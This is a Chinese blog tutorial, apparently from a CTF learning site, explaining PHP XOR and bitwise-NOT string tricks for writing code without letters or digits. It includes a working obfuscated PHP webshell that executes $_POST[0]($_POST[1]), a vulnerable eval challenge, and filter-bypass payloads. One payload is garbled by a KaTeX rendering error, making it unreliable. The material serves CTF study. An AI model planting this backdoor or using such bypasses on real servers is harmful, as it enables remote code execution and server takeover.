这是一段php的代码
<?php
echo "A"^"`";
?>
结果为:
输出的结果是字符"!“,之所以会得到这样的结果,是因为代码中对字符"A"和字符”`"进行了异或操作。
在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成二进制再进行异或,异或完,又将结果从二进制转换成了ASCII值,再将ASCII值转换成字符串。异或操作有时也被用来交换两个变量的值。
那么什么是异或操作呢?
在php中,异或操作是两个二进制数相同时,异或为0,不同为1
比如像上面这个例子
A的ASCII值是65,对应的二进制值是0100 0001
`的ASCII值是96,对应的二进制值是0110 0000
异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!了
由于PHP是弱类型的语言,我们可以不预先声明变量的类型,而直接声明一个变量并进行初始化或赋值操作。正是由于PHP弱类型的这个特点,我们对PHP的变类型进行隐式的转换,并利用这个特点进行一些非常规的操作。如将整型转换成字符串型,将布尔型当作整型,或者将字符串当作函数来处理。
<?php
function B(){
echo "Hello Angel_Kitty";
}
$_++;
$__= "?" ^ "}";
$__();
?>
结果为:
$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中未定义的变量默认值为null,null == false == 0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。
$__="?" ^ "}";对字符"?“和”}“进行异或运算,得到结果B赋给变量名为”__"(两个下划线)的变量
$ __ ();通过上面的赋值操作,变量$__的值为B,所以这行可以看作是B(),在PHP中,这行代码表示调用函数B,所以执行结果为Hello Angel_Kitty。在PHP中,我们可以将字符串当作函数来处理。
下面的一个php代码就是一个非常简单的非数字字母的PHP后门:
<?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
举个例子
<?php
include 'getFlag.php';
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>40){
die("Long.");
}
if(preg_match("/[A-Za-z0-9]+/",$code)){
die("NO.");
}
@eval($code);
}else{
highlight_file(__FILE__);
}
//$hint = "php function getFlag() to get flag";
?>
getFlag代码
<?php
function getFlag(){
echo "{bypass successfully!}";
}
?>
这个代码通过GET进行传参,code参数过滤字母大小写和数字
payload如下:
?code=KaTeX parse error: Expected '}', got 'EOF' at end of input: …="`{{{"^"?<>/";{$}_;&=getFlag
结果如下:
第二种方法取反:
?code=$_=~%98%9A%8B%B9%93%9E%98;$_();
扫一扫
673
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
